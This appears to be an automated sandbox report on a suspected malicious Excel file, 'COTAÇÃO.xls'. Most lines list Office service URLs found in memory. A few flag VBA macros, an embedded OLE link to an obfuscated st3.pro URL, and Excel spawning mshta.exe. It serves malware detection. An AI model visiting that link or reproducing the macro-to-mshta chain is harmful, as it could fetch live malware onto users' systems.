Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.comClo;
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clienti
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientl
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtOffice:
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtOfficeEx
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebookfficetes
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FacebookfficetesJ
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickrersi
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveages
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrivemObjects
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA3E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmediaMBI_SSL_SHORTofficeapps.
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insights.micro
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://invites.office.com/
Source: EXCEL.EXE, 00000000.00000002.4134385036.00000121DF3A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://link.saja.market/
Source: EXCEL.EXE, 00000000.00000002.4135387548.00000121DF9E8000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://link.saja.market/qORxZFFRU3
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://profile.live.com/cid-%s/d-%s/
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://profile.live.com/home/home
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://realtimesync.onenote.com/realtimechannel/v1.0/signalr/hubv1.0/signalr/hubB
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/mro1cdnst
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41
Source: EXCEL.EXE, 00000000.00000002.4111169327.00000121CA5D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/flatfontassets
Source: EXCEL.EXE, 00000000.00000002.4111169327.00000121CA5B5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/office-growth/resources/programmablesurfaces/content/assets/office/wxp-wi
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/office-growth/resourcess
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/polymer/models
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/polymer/modelsapi/0
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://revere.osi.office.net/api/v
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133722863.00000121DF038000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://safelinks.protection.outlook.com/api/GetPolicy
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://safelinks.protection.outlook.com/api/GetPolicy=
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://secure.sharefile.com/oauth/oauthcompl
Source: EXCEL.EXE, 00000000.00000002.4109450255.00000121C81BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://send-to-kindle-word-win32.office.com/
Source: EXCEL.EXE, 00000000.00000002.4109450255.00000121C81BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://send-to-kindle-word-win32.office.com/?status=failedn
Source: EXCEL.EXE, 00000000.00000002.4109450255.00000121C81BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://send-to-kindle-word-win32.office.com/?status=succeeded
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sf-wopi2-sharefile-useast.sharefile.com/service/3
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://shredder.osi.office.net/ShredderService/web/desktop/views/main.cshtmltmlZ
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://skyapi.live.net/Activity/
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://st3.pro/
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://st3.pro/g
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://staging.cortana.ai
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://staging.cortana.aiet/
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://statics.teams.cdn.office.net/e
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://statics.teams.cdn.office.net/evcuN
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://statics.teams.cdn.office.net/evergreen-assVuY
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://statics.teams.cdn.office.net/evergreen-assets/illustratiIu$
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133722863.00000121DF038000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://statics.teams.cdn.office.net/evergreen-assets/illustrations/win32/m365-device-desktop-dark-1
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA815000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://storage.azure.com/
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://store.office.com/client/consent.aspxx-
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://store.office.com/client/consentsideloading.aspxM
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/M365.Accessrs3sK
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/N
Source: EXCEL.EXE, 00000000.00000002.4130078724.00000121DAFE1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/NotesClient3.
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/NotesFabrictions
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/imageB2/v1.0/me/image/resize%28width%3D384%2Cheight%3D384%2CallowResize
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistoryt
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistorytPrint
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/events
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/recommendationsest
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC01000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/recommendedDocuments
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/searchhistory
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/suggestions
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/userconfigHy
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/init/
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/query
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/sharingsuggestion
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/todob2/api/v11e
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.comP
Source: EXCEL.EXE, 00000000.00000002.4130078724.00000121DAFE1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/client/results?fullframe=yes
Source: EXCEL.EXE, 00000000.00000002.4130078724.00000121DAFE1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/client/results?fullframe=yesh
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://syncservice.o365syncservice.com/
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://teams.cloud.microsoft/ups/global/
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://teams.cloud.microsoft/ups/global/authz
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://templates.office.com/templates-for-powerpoint?ocid=oo_toc_client_app_MARVEL_UPS_templates_go
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.htmlOffice
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://us-partner-integrations.egnyte.com/msoffice/authgate/interceptintegrations-staging.qa-egnyte
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://us-partner-integrations.egnyte.com/msoffice/wopibootstrapper?betad221f797-d1d1-4289-9a6d-d36
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://web.microsoftstream.com/video/
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://web.microsoftstream.com/video/P
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://webshell.suite.office.com
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wopi.dropbox.com/wopibootstrapperyr8ricy1tm3biywaccount_info.write
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wopi.netdocuments.app/wopi/wopibootstrapperAP-QXT2JHXGread
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word-edit.officeapps.live.com/we/rrdiscove
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word-edit.officeapps.live.com/we/rrdiscove0000
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word-edit.officeapps.live.com/we/rrdiscovery.ashx
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wordcs.officeapps.live.com/wordauto/wordautomation.svc/wordautomationl
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wordcs.officeapps.live.com/wrdps/wordprint.svc/wrdprint
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wus2.pagecontentsync.
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wus2.pagecontentsync.onenote.com/pagecontentsync/attachment/v1nc/attachment/v1
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA22C64
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2es
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.box.com/https://odc.officeapps.live.com/odc/stat/images/sm/partner/box/logo16.pnghttps:/
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/https://odc.officeapps.live.com/odc/stat/images/sm/partner/Dropbox/plus16.pn
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/ow/msft/oauth_callbackwopi.dropbox.comwww.dropbox.comapi.dropbox.comhelp.dro
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.egnyte.com/https://odc.officeapps.live.com/odc/stat/images/sm/partner/egnyte/egnyte_logo
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/https://odc.offi
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/https://odc.officeapps.live.com/odc/stat/images/sm/g
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/calendar
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/contacts
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.netdocuments.com/c
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.netdocuments.com/https://odc.officeapps.live.com/odc/stat/images/sm/partner/NetDocuments
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/(f7
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/0r7
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/https://odc.officeapps.live.com/odc/stat/images/sm/officestore_16_2.pnghttps:
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/officeaddins/jotspypy
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/sync/notebooks/sharere
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/sync/pages/shared/d/t
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/sync/v1/invitationsns
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/sync/v1/membershipsps
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/sync/v1/pageses3
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/sync/v1/usersrs1
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/userinfo/v1/settingng
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/userinfo/v1/settings/IsFeatureEnabled/PremiumFeatureses
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/userinfo/v1/whoisis
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/whatsnext/Macac23
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/whatsnext/iOSOS02
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.sharefile.com/https://odc.officeapps.live.com/odc/stat/images/sm/partner/citrix
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.unicorn.
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yahoo.com/6
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yammer.com
Source: unknown | Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown | Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown | HTTPS traffic detected: 13.107.246.76:443 -> 192.168.2.26:49943 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.246.76:443 -> 192.168.2.26:49944 version: TLS 1.2
Source: COTA#U00c7#U00c3O.xls | OLE indicator, VBA macros: true
Source: WER.4be0a932-1407-436a-8165-1e536490c761.tmp.xml.10.dr | OLE indicator, VBA macros: true
Source: COTA#U00c7#U00c3O.xlsStream path 'MBD006B205A/\x1Ole' : https://st3.pro/YjzNwpD?&slope=needy&robert=grotesque&crest=fragile&agreemen07suB'4>Ob<"z@`etm_I]H!Lc^CGHKA5S<4,E#:euo*XaK1LvLBy9CH3JJKQ17Rk34HdztDkfKgrmsD8ayfpMkL7MDOhJneu8GV14DJPljyksSx4EVja5eSBmGcKSRZj8zsDmZS4LTcr4xlqIsedrY28TorcdYEiuCerxgKtEKj8Qb4fs5hOEPsa7BW10AprosvPmpourG5TFCoVW4mcid2gkhp6jbvweqSgHYEWunT9ch7wNde3vA*p*]TI9A`'STB+B
Source: WER.4be0a932-1407-436a-8165-1e536490c761.tmp.xml.10.dr | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | Process token adjusted: Security
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7468 -s 4084
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA2D8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VBA.INSERT.VBp
Source: classification engine | Classification label: mal56.expl.winXLS@10/17@4/4
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7468
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{0B5322E7-C1B7-4D6F-BA09-272848C35304} - OProcSessId.dat
Source: COTA#U00c7#U00c3O.xls | OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: EXCEL.EXE, 00000000.00000002.4130078724.00000121DAFE1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SELECT tenant_token FROM events ORDER BY persistence ASC, timestamp ASC LIMIT MAX(1,(SELECT COUNT(record_id) FROM events)* ? / 100)A28F7CB};{8265A5EF-46C7-4D46-812C-076F2A28F7CB};{8265A5EF-46C7-4D46-812C-176F2A28F7CB};{8265A5EF-46C7-4D46-812C-176F2A28F7CB};{6C3DC9F9-B616-4849-8F45-F02439482948};{6C3DC9F9-B616-4849-8F45-102439482948};{DACE5A15-C57C-44DE-9AFF-89B4412485AF};{DACE5A15-C57C-44DE-9AFF-19B4412485AF};{74F233A9-A17A-477C-905F-853F5FCDAD40};{74F233A9-A17A-477C-905F-153F5FCDAD40};{FD5B39A3-4CAC-4A3F-BD50-485BD6DDD983};{FD5B39A3-4CAC-4A3F-BD50-185BD6DDD983}:308;470;2619;11529;11690;11920;11924;12119;13915;13916;14014;14098;14099;14409;14606;14842;14848
Source: COTA#U00c7#U00c3O.xls | Virustotal: Detection: 25%
Source: COTA#U00c7#U00c3O.xls | ReversingLabs: Detection: 21%
Source: unknown | Process created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7468 -s 4084
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7468 -s 1976
